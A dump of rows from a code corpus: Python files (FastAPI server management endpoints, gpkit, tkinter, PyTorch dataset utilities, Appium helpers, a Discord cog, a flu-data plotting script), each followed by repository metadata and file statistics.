return {'result': 'failure', 'reason': f'Server {name} not online.'}
return {'result': 'success'}
@app.post('/servers/{name}/modify_prop')
async def start_server(name: str, res: Response, req: Request):
fields = await req.json()
if not 'content' in fields.keys():
res.status_code = HTTP_400_BAD_REQUEST
return {'result': 'failure', 'reason': 'Content not passed.'}
if database.servers.find_one({'name': name}):
with open(os.path.join(CONFIG['server_folder'], name, 'server.properties'), 'w') as f:
f.write(fields['content'])
else:
res.status_code = HTTP_404_NOT_FOUND
return {'result': 'failure', 'reason': f'Server {name} does not exist.'}
@app.post('/servers/{name}/modify_spec')
async def start_server(name: str, res: Response, req: Request):
fields = await req.json()
if not 'content' in fields.keys():
res.status_code = HTTP_400_BAD_REQUEST
return {'result': 'failure', 'reason': 'Content not passed.'}
if database.servers.find_one({'name': name}):
try:
database.servers.replace_one({'name': name}, json.loads(fields['content']))
return {'result': 'success'}
except:
res.status_code = HTTP_400_BAD_REQUEST
return {'result': 'failure', 'reason': 'Bad content format.'}
else:
res.status_code = HTTP_404_NOT_FOUND
return {'result': 'failure', 'reason': f'Server {name} does not exist.'}
@app.get('/servers/{name}/')
async def get_server_info(name: str, res: Response):
spec = database.servers.find_one({'name': name})
if spec:
del spec['_id']
with open(os.path.join(CONFIG['server_folder'], name, 'server.properties'), 'r') as f:
props = f.read()
return {
'result': 'success',
'spec': spec,
'prop': props,
'running': name in manager.servers.keys()
}
else:
res.status_code = HTTP_404_NOT_FOUND
return {'result': 'failure', 'reason': f'Server {name} does not exist.'}
@app.get('/servers')
async def list_servers():
    """Map each registered server name to its autostart/running/address/memory info."""
    server_dict = {}
    for s in database.servers.find():
        # Only report servers whose folder still exists on disk; stale DB
        # entries are silently skipped.
        if os.path.exists(os.path.join(CONFIG['server_folder'], s['name'])):
            server_dict[s['name']] = {
                'autostart': s['enabled'],
                'running': s['name'] in manager.servers.keys(),
                'address': s['address'],
                'mem': s['max_memory']
            }
return server_dict | 38.214058 | 142 | 0.621269 | 1,449 | 11,961 | 5.004831 | 0.198068 | 0.038058 | 0.041919 | 0.048263 | 0.338389 | 0.322532 | 0.295229 | 0.288748 | 0.273442 | 0.258825 | 0 | 0.009465 | 0.222724 | 11,961 | 313 | 143 | 38.214058 | 0.770571 | 0.006688 | 0 | 0.266904 | 0 | 0.003559 | 0.234804 | 0.018269 | 0 | 0 | 0 | 0 | 0 | 1 | 0.003559 | false | 0.032028 | 0.078292 | 0 | 0.192171 | 0.010676 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
82371535c737935c03e91ede47e391e948acafe2 | 567 | py | Python | docs/source/examples/simple_sp.py | giserh/gpkit | 71b953fcac8f67f148b67b54b6e8cd4182dc0b3b | [
"MIT"
] | null | null | null | docs/source/examples/simple_sp.py | giserh/gpkit | 71b953fcac8f67f148b67b54b6e8cd4182dc0b3b | [
"MIT"
] | null | null | null | docs/source/examples/simple_sp.py | giserh/gpkit | 71b953fcac8f67f148b67b54b6e8cd4182dc0b3b | [
"MIT"
] | null | null | null | """Adapted from t_SP in tests/t_geometric_program.py"""
import gpkit

# Decision variables
x = gpkit.Variable('x')
y = gpkit.Variable('y')

# must enable signomials for subtraction
with gpkit.SignomialsEnabled():
    constraints = [x >= 1-y, y <= 0.1]

# create and solve the SP (signomial program, solved by iterated GP)
m = gpkit.Model(x, constraints)
print(m.localsolve(verbosity=0).summary())
# Sanity check: at the optimum y sits on its bound 0.1, so x = 1 - 0.1 = 0.9.
assert abs(m.solution(x) - 0.9) < 1e-6

# full interim solutions are available
print("x values of each GP solve (note convergence)")
print(", ".join("%.5f" % sol["freevariables"][x] for sol in m.program.results))
| 28.35 | 79 | 0.705467 | 88 | 567 | 4.511364 | 0.659091 | 0.065491 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018443 | 0.13933 | 567 | 19 | 80 | 29.842105 | 0.795082 | 0.29806 | 0 | 0 | 0 | 0 | 0.167095 | 0 | 0 | 0 | 0 | 0 | 0.1 | 1 | 0 | false | 0 | 0.1 | 0 | 0.1 | 0.3 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8237d91bd367fa37819ecabb2d7d852f0f4245f3 | 550 | py | Python | aula075.py | juniorpedroso/CFBCursos | 88657d6aad38de7d41e76499f0ff4d85a02745ae | [
"MIT"
] | null | null | null | aula075.py | juniorpedroso/CFBCursos | 88657d6aad38de7d41e76499f0ff4d85a02745ae | [
"MIT"
] | null | null | null | aula075.py | juniorpedroso/CFBCursos | 88657d6aad38de7d41e76499f0ff4d85a02745ae | [
"MIT"
] | null | null | null | # Aula 75 - SpinBox
# Lesson 75 - SpinBox
from tkinter import *

app = Tk()
app.title('Pedroso')
app.geometry('500x300')


def exibirValor():
    # Read the value currently selected in the spinbox and show it on the label.
    vvalor = sb_valores.get()
    l_valor.config(text=vvalor)


# sb_valores = Spinbox(app, from_=0, to=10)
# The values can be supplied as a range, as above,
# or as a tuple, as below
sb_valores = Spinbox(app, values=(2, 4, 6, 8, 10))
sb_valores.pack()

l_valor = Label(app, text='Valor')
l_valor.pack()

btn_exibeValor = Button(app, text='Exibe Valor', command=exibirValor)
btn_exibeValor.pack()

app.mainloop()
| 19.642857 | 69 | 0.705455 | 85 | 550 | 4.447059 | 0.6 | 0.095238 | 0.079365 | 0.100529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.036403 | 0.150909 | 550 | 27 | 70 | 20.37037 | 0.773019 | 0.267273 | 0 | 0 | 0 | 0 | 0.075377 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.071429 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
823a986d979638441ae38a1104614b823b72f2d7 | 3,922 | py | Python | src/data/dataset_utils.py | GuillaumeBarree/challenge-ENS | 50f1faa58be50a7c8cbd6078b4495679fd112c05 | [
"MIT"
] | null | null | null | src/data/dataset_utils.py | GuillaumeBarree/challenge-ENS | 50f1faa58be50a7c8cbd6078b4495679fd112c05 | [
"MIT"
] | null | null | null | src/data/dataset_utils.py | GuillaumeBarree/challenge-ENS | 50f1faa58be50a7c8cbd6078b4495679fd112c05 | [
"MIT"
] | null | null | null | """This file contains all functions related to the dataset."""
# pylint: disable=import-error
import os
import tqdm
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
from torch.utils.data import Dataset
class RegressionDataset(Dataset):
    """Torch ``Dataset`` pairing feature rows with regression targets.

    ``x_data`` and ``y_data`` must be indexable and of equal length; the
    dataset's length is taken from ``y_data``.
    """

    def __init__(self, x_data, y_data):
        self.x_data = x_data
        self.y_data = y_data

    def __len__(self):
        # Number of samples, as required by torch DataLoader.
        return len(self.y_data)

    def __getitem__(self, index):
        # One sample: a (features, target) pair.
        sample = (self.x_data[index], self.y_data[index])
        return sample
def basic_random_split(path_to_train, valid_ratio=0.2):
    """Load the training files and split them for training and validation.

    Args:
        path_to_train (str): path of the data root directory.
        valid_ratio (float): ratio of data for the validation dataset.

    Returns:
        dict: Dictionary containing every array needed to create a Dataset.
    """
    # Pipeline: load CSVs -> strip identifier columns -> train/valid split.
    raw = load_files(path_to_data=path_to_train)
    cleaned = remove_useless_features(training_data=raw)
    return create_x_and_y(input_data=cleaned, valid_ratio=valid_ratio)
def load_test_data(path_to_test):
    """Load test data and attach placeholder targets.

    Args:
        path_to_test (str): path of the data root directory.

    Returns:
        dict: {'x_test': feature ndarray, 'y_test': 1-D ndarray of ones}.

    Fixes vs. original: the dead ``test_data["target"]`` assignment and the
    second, duplicated ``np.ones`` computation were removed; ``ravel()`` on an
    already-1-D vector was dropped.
    """
    # Load the different files
    test_data = load_files(path_to_data=path_to_test)

    # Drop the row-identifier column; it is not a model feature.
    inputs = test_data["input"].drop(columns=["_ID"])

    # True targets are unknown at test time, so supply a flat vector of ones.
    return {
        "x_test": inputs.to_numpy(),
        "y_test": np.ones(len(inputs)),
    }
def load_files(path_to_data):
    """Read every CSV file in a directory into DataFrames.

    Args:
        path_to_data (str): path of the data root directory.

    Returns:
        dict: DataFrames keyed by 'input' (filename contains "input")
        or 'target' (any other filename).
    """
    loaded = {}
    for filename in tqdm.tqdm(os.listdir(path_to_data)):
        # Files with "input" in the name hold features; everything else targets.
        key = "input" if "input" in filename else "target"
        loaded[key] = pd.read_csv(
            os.path.join(path_to_data, filename), delimiter=",", decimal="."
        )
    return loaded
def remove_useless_features(training_data):
    """Strip the row-identifier column from every loaded DataFrame.

    Args:
        training_data (dict): DataFrames keyed by file role ('input'/'target').

    Returns:
        dict: Same keys, with the '_ID' column dropped from each DataFrame
        (the originals are left untouched; ``drop`` returns copies).
    """
    return {
        key: frame.drop(columns=["_ID"])
        for key, frame in training_data.items()
    }
def create_x_and_y(input_data, valid_ratio):  # pylint: disable=too-many-locals
    """Generate train and validation arrays from features and targets.

    Args:
        input_data (dict): 'input' (features) and 'target' DataFrames.
        valid_ratio (float): fraction of rows held out for validation.

    Returns:
        dict: x_train/y_train/x_valid/y_valid numpy arrays; targets are
        flattened to 1-D vectors.

    Fixes vs. original: removed the dead ``feature_and_target = {}`` store
    and the intermediate target variables that were immediately reassigned.
    """
    # Deterministic split (random_state=0) so repeated runs agree.
    x_train, x_valid, y_train, y_valid = train_test_split(
        input_data["input"], input_data["target"], test_size=valid_ratio, random_state=0
    )
    return {
        "x_train": x_train.to_numpy(),
        "y_train": y_train.values.ravel(),
        "x_valid": x_valid.to_numpy(),
        "y_valid": y_valid.values.ravel(),
    }
| 26.863014 | 92 | 0.661652 | 539 | 3,922 | 4.54731 | 0.207792 | 0.031824 | 0.02856 | 0.014688 | 0.28927 | 0.25459 | 0.20155 | 0.189718 | 0.106079 | 0.106079 | 0 | 0.001006 | 0.239419 | 3,922 | 145 | 93 | 27.048276 | 0.82065 | 0.343447 | 0 | 0.095238 | 0 | 0 | 0.044702 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.126984 | false | 0 | 0.095238 | 0.031746 | 0.349206 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8240cdb3f22524daceb3ca1aaf3cf523bd2c0df4 | 12,619 | py | Python | poseidon/ui/mobile/android/base_page.py | peterkang2001/Poseidon | cfafc01a1f69210dbfd95a0c62e06269eb599034 | [
"Apache-2.0"
] | 2 | 2019-12-27T09:14:38.000Z | 2019-12-27T09:16:29.000Z | poseidon/ui/mobile/android/base_page.py | CodeMonkey4Fun/Poseidon | cfafc01a1f69210dbfd95a0c62e06269eb599034 | [
"Apache-2.0"
] | 2 | 2021-03-31T20:06:21.000Z | 2021-12-13T20:48:16.000Z | poseidon/ui/mobile/android/base_page.py | peterkang2001/Poseidon | cfafc01a1f69210dbfd95a0c62e06269eb599034 | [
"Apache-2.0"
] | 1 | 2020-11-13T07:37:01.000Z | 2020-11-13T07:37:01.000Z | # coding=utf-8
"""
@author:songmengyun
@file: base_page.py
@time: 2020/01/03
"""
import time
import logging
from selenium.webdriver.common.by import By
from appium.webdriver.common.touch_action import TouchAction
from selenium.webdriver.support.wait import WebDriverWait
from appium.webdriver.mobilecommand import MobileCommand
from appium.webdriver.connectiontype import ConnectionType
from poseidon.ui.util.location import *
from poseidon.base import CommonBase as cb
from poseidon.ui.mobile.android.android_keycode import KEYCODE
class Swipe:
    '''Screen-swipe helpers built on the appium driver's ``swipe`` call.

    Fix vs. original: the four directional methods repeated the same
    pause/log/loop body verbatim; it is factored into ``_swipe_n_times``
    with timing and log output preserved exactly.
    '''

    def __init__(self, driver):
        self.driver = driver

    def _swipe_n_times(self, x1, y1, x2, y2, n):
        """Shared swipe loop: 3s pause and a log line up front, then a log
        line and 3s pause before each of the n gestures."""
        time.sleep(3)
        logging.info("滑动前")
        for i in range(n):
            logging.info("第%d次滑屏" % i)
            time.sleep(3)
            self.driver.swipe(x1, y1, x2, y2)

    def swipe_up(self, width, height, n=5):
        '''Swipe upwards: from 90% of the height to the upper quarter, n times.'''
        logging.info("定义向上滑动方法")
        x = width * 0.5
        self._swipe_n_times(x, height * 0.9, x, height * 0.25, n)

    def swipe_down(self, width, height, n=5):
        '''Swipe downwards: from the upper quarter to 90% of the height, n times.'''
        logging.info("定义向下滑动方法")
        x = width * 0.5
        self._swipe_n_times(x, height * 0.25, x, height * 0.9, n)

    def swipe_left(self, width, height, n=5):
        '''Swipe leftwards: from 80% to 20% of the width at mid-height, n times.'''
        logging.info("定义向左滑动方法")
        y = height * 0.5
        self._swipe_n_times(width * 0.8, y, width * 0.2, y, n)

    def swipe_right(self, width, height, n=5):
        '''Swipe rightwards: from 20% to 80% of the width at mid-height, n times.'''
        logging.info("定义向右滑动方法")
        y = height * 0.5
        self._swipe_n_times(width * 0.2, y, width * 0.8, y, n)
class Action:
    '''Element lookup, gesture and notification-bar helpers.

    Fix vs. original: ``get_element`` and ``get_elements`` were two parallel
    8-branch if/elif chains; they now share one strategy dispatch table.
    Logged output is unchanged.
    '''

    # Locator strategy -> (single finder, multi finder, label used in debug logs).
    _FINDERS = {
        By.ID: (findId, findsId, 'id'),
        By.XPATH: (findXpath, findsXpath, 'xpath'),
        By.LINK_TEXT: (findLinkText, findsLinkText, 'link text'),
        By.PARTIAL_LINK_TEXT: (findPLinkText, findsPLinkText, 'partial link text'),
        By.NAME: (findName, findsName, 'name'),
        By.TAG_NAME: (findTagName, findsTagName, 'tag name'),
        By.CLASS_NAME: (findClassName, findsClassName, 'class name'),
        By.CSS_SELECTOR: (findCss, findsCss, 'css selector'),
    }

    def __init__(self, driver):
        self.driver = driver
        self.action = TouchAction(self.driver)

    def get_element(self, locator):
        """
        Resolve a (strategy, value) locator to a single selenium webelement.
        :param locator: tuple of (By.<strategy>, value)
        :return: the element, or None when the strategy is unknown
        """
        entry = self._FINDERS.get(locator[0])
        if entry is None:
            logging.error("错误的locator_type,请确认")
            return None
        find_one, _, label = entry
        element = find_one(self.driver, locator[1])
        logging.debug("使用 {0} 定位元素 ==> {1}".format(label, locator[1]))
        return element

    def get_elements(self, locator):
        """
        Resolve a (strategy, value) locator to a list of selenium webelements.
        :param locator: tuple of (By.<strategy>, value)
        :return: the elements, or None when the strategy is unknown
        """
        entry = self._FINDERS.get(locator[0])
        if entry is None:
            logging.error("错误的locator_type,请确认")
            return None
        _, find_many, label = entry
        elements = find_many(self.driver, locator[1])
        logging.debug("使用 {0} 定位元素 ==> {1}".format(label, locator[1]))
        return elements

    def set_touch_pwd(self, locator):
        '''
        Draw a gesture-unlock pattern starting at the element found by `locator`.
        :param locator: locator of the first touch point (location/size anchor)
        :return:
        '''
        start = self.get_element(locator)
        start_height = start.size['height']
        start_width = start.size['width']
        start_x = start.location['x']
        start_y = start.location['y']
        begin_x = start_x + start_width / 2
        begin_y = start_y + start_height / 2
        action = TouchAction(self.driver)
        action.press(x=start_x, y=start_y).wait(100).move_to(x=start_x + start_width * 2, y=begin_y).wait(100).\
            move_to(x=start_x + start_width * 2, y=start_y + start_height * 2).wait(100).\
            move_to(x=begin_x, y=start_y + start_height * 2).release().perform()

    def adjust_volume(self, size):
        '''Adjust system volume up or down (not implemented).'''

    def adjust_brightness(self, size):
        '''Adjust screen brightness up or down (not implemented).'''

    def clean_notification_bar_message(self):
        '''Clear notification bar messages.'''
        self.driver.open_notifications()  # open the pull-down notification bar

    def open_close_wifi(self):
        '''Toggle Wi-Fi on/off (not implemented).'''

    def airplane_mode(self):
        '''Enable airplane mode (not implemented).'''
class KeyEvent:
    '''Hardware key-press events.'''

    def __init__(self, driver):
        self.driver = driver

    def volume(self, size: int) -> None:
        '''Press the volume key |size| times: up when size >= 0, down when negative.'''
        if size >= 0:
            for i in range(0, size):
                self.driver.press_keycode(KEYCODE.KEYCODE_VOLUME_UP)  # volume-up key
        else:
            for i in range(size, 0):
                self.driver.press_keycode(KEYCODE.KEYCODE_VOLUME_DOWN)  # volume-down key
        # NOTE(review): BACK is pressed unconditionally after every volume
        # adjustment — confirm this is intended and not a stray statement.
        self.driver.press_keycode(KEYCODE.KEYCODE_BACK)  # back key
class AssertBase:
    '''Assertion helpers.'''

    def __init__(self, driver):
        self.driver = driver

    @cb.com_try_catch
    def check_current_activity(self, app_activity):
        '''Check that the driver's current activity equals the given app_activity.'''
        current_activity = self.driver.current_activity
        if current_activity:
            cb.checkEqual(current_activity, app_activity)
        else:
            # No activity reported by the driver; log instead of comparing.
            logging.error('当前没有app_activity')
class BasePage(Swipe, Action, KeyEvent, AssertBase):
    '''Aggregates the helper mixins and adds misc. app/device utilities.'''

    def __init__(self, driver):
        self.driver = driver
        super().__init__(driver=self.driver)

    @cb.com_try_catch
    def install_app(self, app_path: str, app_package: str):
        '''
        Install the app only when it is not already installed.
        :param app_path: path to the installation package
        :param app_package: package name of the app
        '''
        if self.driver.is_app_installed(app_package):
            logging.info(f'{app_package}已安装')
        else:
            self.driver.install_app(app_path)
            logging.info(f'{app_package}安装成功')

    @cb.com_try_catch
    def uninstall_app(self, app_package: str):
        '''
        Uninstall the app only when it is currently installed.
        :param app_package: package name of the app
        '''
        if self.driver.is_app_installed(app_package):
            self.driver.remove_app(app_package)
            logging.info(f'{app_package}卸载成功')
        else:
            logging.info(f'{app_package}已卸载')

    @cb.com_try_catch
    def open_app(self, app_package: str, app_activity: str) -> None:
        '''
        Open an activity in the current app, or start a new app and open one.
        :param app_package: package to open
        :param app_activity: activity to open
        '''
        logging.info(f'当前activity: {self.driver.current_activity}')
        self.driver.start_activity(app_package, app_activity)
        logging.info(f'当前activity: {self.driver.current_activity}')

    def app_strings(self):
        '''Return the application's strings for the English locale.'''
        string = self.driver.app_strings(language='en')
        return string

    @cb.com_try_catch
    def get_app_package_info(self):
        """
        :return: [current package name, current activity name]
        """
        return [self.driver.current_package, self.driver.current_activity]

    @cb.com_try_catch
    def get_window_info(self):
        '''Return the screen size as [width, height].'''
        size = self.driver.get_window_size()
        width = size['width']
        height = size['height']
        return [width, height]

    def lock_app(self):
        '''Lock the screen (for 5 seconds).'''
        self.driver.lock(5)

    def hide_keyboard(self):
        '''Dismiss the soft keyboard.'''
        self.driver.hide_keyboard()

    def shake_app(self):
        '''Simulate shaking the device.'''
        self.driver.shake()

    def current_content(self):
        '''Return the current driver context.'''
        current_content = self.driver.current_context  # the current context
        # NOTE(review): the appium client exposes `driver.contexts` for the list
        # of available contexts; `driver.contents` looks like a typo and would
        # raise AttributeError at runtime — confirm before relying on this.
        current_contents = self.driver.contents  # list all available contexts
        return current_content

    @cb.com_try_catch
    def backgroup_app(self, seconds: int, restart=True):
        '''Background the app for `seconds`; no-op when restart is not True.'''
        if restart == True:
            self.driver.background_app(seconds)
        else:
            pass

    @cb.com_try_catch
    def wait(self, fun, timeout=10, fre=1):
        '''
        Explicit wait: poll every `fre` seconds, up to `timeout`, until `fun` holds.
        :return:
        '''
        wait = WebDriverWait(self.driver, timeout, fre)
        wait.until(fun)

    @cb.com_try_catch
    def click_element(self, locator, is_button=True):
        """
        Click an element: native click when is_button, TouchAction tap otherwise.
        :param locator:
        :param is_button:
        :return:
        """
        element = self.get_element(locator)
        if is_button:
            element.click()
        else:
            element = self.get_element(locator)
            TouchAction(self.driver).tap(element).perform()

    @cb.com_try_catch
    def set_text(self, locator, values):
        """
        Clear a text field and type `values` into it.
        :param locator:
        :param values:
        :return:
        """
        text_field = self.get_element(locator)
        text_field.clear()
        text_field.send_keys(values)

    def clean_app_cash(self, app_package):
        '''Clear the app cache (not implemented).'''

    def is_displayed(self, locator, mark=True):
        """
        Return whether the located element is displayed, highlighting it
        first when `mark` is True.
        :param locator:
        :return:
        """
        element = self.get_element(locator)
        if mark:
            self.hight_light(element)
        return element.is_displayed()

    def hight_light(self, element, times=2, seconds=2, color="red", border=2):
        """
        Flash a coloured border around the element (via injected JS) if found.
        :param element:
        :param times:
        :param seconds:
        :return:
        """
        js = "element = arguments[0]; " \
             "original_style = element.getAttribute('style'); " \
             "element.setAttribute('style', original_style + \";" \
             "border: %spx solid %s;\");" \
             "setTimeout(function(){element.setAttribute('style', original_style);}, 1000);" % (border, color)
        try:
            for i in range(0, times):
                self.driver.execute_script(js, element)
        except Exception as e:
            logging.error(e)

    def switch_h5_app(self, context):
        # Switch the driver into the given (H5/webview) context.
        self.driver.execute(MobileCommand.SWITCH_TO_CONTEXT, {"name": context})

    def find_item(self, el):
        '''Return True when the string `el` occurs in the current page source.'''
        logging.info(f'验证页面元素:{el} 是否存在')
        source = self.driver.page_source
        if el in source:
            return True
        else:
            return False
| 29.902844 | 113 | 0.576908 | 1,479 | 12,619 | 4.770791 | 0.198107 | 0.085034 | 0.029478 | 0.040816 | 0.452664 | 0.3947 | 0.353033 | 0.293651 | 0.273243 | 0.257653 | 0 | 0.017684 | 0.296458 | 12,619 | 421 | 114 | 29.973872 | 0.777089 | 0.083842 | 0 | 0.393701 | 0 | 0 | 0.085046 | 0.015529 | 0 | 0 | 0 | 0 | 0.007874 | 1 | 0.149606 | false | 0.003937 | 0.03937 | 0 | 0.244094 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8243b500985cbd67fd910c97e1596597cb663eae | 958 | py | Python | cogs/testing.py | classerase/Stand-Arrow | 89183c266913af889dabb68f4d0c39153875f7da | [
"MIT"
] | 2 | 2020-06-03T20:48:09.000Z | 2020-06-04T04:29:06.000Z | cogs/testing.py | BrianDehlinger/Stand-Arrow | 150cb741c73a244a88ce1cbcb21c71753848bbc6 | [
"MIT"
] | 2 | 2020-06-15T18:28:17.000Z | 2020-06-17T20:44:43.000Z | cogs/testing.py | BrianDehlinger/Stand-Arrow | 150cb741c73a244a88ce1cbcb21c71753848bbc6 | [
"MIT"
] | 1 | 2020-06-03T20:48:07.000Z | 2020-06-03T20:48:07.000Z | from discord.ext import commands
class Testing(commands.Cog):
    """Debug/testing commands; destructive ones are gated to a single test user.

    Fix vs. original: in both gated commands, ``await ctx.send(...)`` was
    placed *after* ``raise ValueError`` and therefore unreachable — the
    caller never received the notice. The send now happens before the raise.
    """

    def __init__(self, bot):
        self.bot = bot

    @commands.command()
    async def who(self, ctx):
        """Reply with the invoking user's name."""
        author = ctx.author
        await ctx.send(f"Hello {author}")

    @commands.command()
    async def debug_free_cash(self, ctx):
        """Grant $1000 to the test user; reject anyone else."""
        author = ctx.author
        if str(ctx.author) != "TestUser#0001":
            # Notify the caller, then abort the command.
            await ctx.send("You are not authorized to do that")
            raise ValueError("Unauthorized API usage")
        else:
            await ctx.insert_into_inventory(author, "money", 1000)
            await ctx.send("You have been given $1000!")

    @commands.command()
    async def debug_clear(self, ctx):
        """Clear the test user's inventory; reject anyone else."""
        author = ctx.author
        if str(ctx.author) != "TestUser#0001":
            await ctx.send("You are not authorized to do that!")
            raise ValueError("Unauthorized API usage")
        else:
            await ctx.clear_inventory(author)
| 30.903226 | 66 | 0.605428 | 120 | 958 | 4.75 | 0.416667 | 0.126316 | 0.084211 | 0.121053 | 0.607018 | 0.470175 | 0.470175 | 0.470175 | 0.470175 | 0.470175 | 0 | 0.023392 | 0.286013 | 958 | 30 | 67 | 31.933333 | 0.809942 | 0 | 0 | 0.48 | 0 | 0 | 0.189979 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.04 | false | 0 | 0.04 | 0 | 0.12 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8245cf950c7faf9f93224170dad96f903d0f0be0 | 2,603 | py | Python | scripts/create_fluseverity_figs_v5/S_deltaILIpercent_time_CDCbaseline_v5.py | eclee25/flu-SDI-exploratory-age | 2f5a4d97b84d2116e179e85fe334edf4556aa946 | [
"MIT"
] | 3 | 2018-03-29T23:02:43.000Z | 2020-08-10T12:01:50.000Z | scripts/create_fluseverity_figs_v5/S_deltaILIpercent_time_CDCbaseline_v5.py | eclee25/flu-SDI-exploratory-age | 2f5a4d97b84d2116e179e85fe334edf4556aa946 | [
"MIT"
] | null | null | null | scripts/create_fluseverity_figs_v5/S_deltaILIpercent_time_CDCbaseline_v5.py | eclee25/flu-SDI-exploratory-age | 2f5a4d97b84d2116e179e85fe334edf4556aa946 | [
"MIT"
] | null | null | null | #!/usr/bin/python
##############################################
###Python template
###Author: Elizabeth Lee
###Date: 1/25/15
###Function: time series difference in ILI percentage from CDC-based ILI baseline calculation
###Import data: SQL_export/OR_allweeks_outpatient.csv, anydiag_allweeks_outpatient.csv
###Command Line: python S_deltaILIpercent_time_CDCbaseline_v5.py
##############################################
### notes ###
# Baseline is mean percentage of patient ILI visits during non-flu weeks for the previous 3 seasons plus 2 standard deviations. A non-flu week is a period of 2+ consecutive weeks where flu was <2% of the total number of specimens lab-confirmed for flu. (cdc.gov/flu/weekly/overview.htm)
### packages/modules ###
import csv
import matplotlib.pyplot as plt
## local modules ##
import functions_v5 as fxn
### data structures ###
### functions ###
### data files ###
ILIin = open('/home/elee/Dropbox/Elizabeth_Bansal_Lab/SDI_Data/explore/SQL_export/OR_allweeks_outpatient.csv','r')
ILIfile = csv.reader(ILIin, delimiter=',')
visitin = open('/home/elee/Dropbox/Elizabeth_Bansal_Lab/SDI_Data/explore/SQL_export/anydiag_allweeks_outpatient.csv', 'r')
visitin.readline() # rm header
visitfile = csv.reader(visitin, delimiter=',')
### called/local plotting parameters ###
ps = fxn.pseasons
fw = fxn.gp_fluweeks
sl = fxn.gp_seasonlabels
colvec = fxn.gp_colors
wklab = fxn.gp_weeklabels
fs = 24
fssml = 16
### program ###
# dict_wk[wk] = seasonnum
# dict_ILIpercent[Thu date of week] = ILI as percent of total visits in that week (not a cumulative measure)
# dict_deltaILIpercent53ls[s] = [deltaILI percent wk 40, wk 41, ...wk 39
# dict_refWeek[s] = date of reference week for that season
d_wk, d_ILIpercent = fxn.week_ILIpercent_processing(ILIfile, visitfile)
code = 'cdc'
d_cdcILIpercent53ls = fxn.ILIpercent_processing_CDCbaseline(d_wk, d_ILIpercent)
# plot delta ILI percent time series
for s in ps:
plt.plot(xrange(53), d_cdcILIpercent53ls[s], marker = fxn.gp_marker, color = colvec[s-2], label = sl[s-2], linewidth = fxn.gp_linewidth)
plt.hlines([0], 0, 55, colors='k', linestyles='solid', linewidth=3)
plt.xlim([0, 52])
plt.xticks(range(53)[::5], wklab[::5])
plt.xlabel('Week Number', fontsize=fs)
plt.ylabel('delta ILI perc (ref %s)' % (code), fontsize=fs)
plt.legend(loc='upper right', prop={'size':10})
plt.savefig('/home/elee/Dropbox/Elizabeth_Bansal_Lab/Manuscripts/Age_Severity/fluseverity_figs_v5/exploratory/new_baseline_definition/deltaILIpercent_time_ref%s.png' %(code), transparent=False, bbox_inches='tight', pad_inches=0)
plt.close()
# plt.show()
| 40.046154 | 286 | 0.726854 | 379 | 2,603 | 4.852243 | 0.503958 | 0.016313 | 0.045677 | 0.039152 | 0.113105 | 0.113105 | 0.065253 | 0.065253 | 0.065253 | 0.065253 | 0 | 0.020241 | 0.107952 | 2,603 | 64 | 287 | 40.671875 | 0.771748 | 0.392624 | 0 | 0 | 0 | 0.035714 | 0.290254 | 0.242938 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.107143 | 0 | 0.107143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8246faf773d4f1bfd0da404df98ee155653febc9 | 4,328 | py | Python | sentrylogs/bin/sentrylogs.py | hossein/sentrylogs | 70eaf665f9010ba2d8370ccc4013673bab7e2b16 | [
"BSD-3-Clause"
] | 32 | 2015-07-01T11:12:32.000Z | 2021-09-04T23:58:27.000Z | sentrylogs/bin/sentrylogs.py | hossein/sentrylogs | 70eaf665f9010ba2d8370ccc4013673bab7e2b16 | [
"BSD-3-Clause"
] | 37 | 2016-05-27T13:55:24.000Z | 2022-02-24T14:55:58.000Z | sentrylogs/bin/sentrylogs.py | hossein/sentrylogs | 70eaf665f9010ba2d8370ccc4013673bab7e2b16 | [
"BSD-3-Clause"
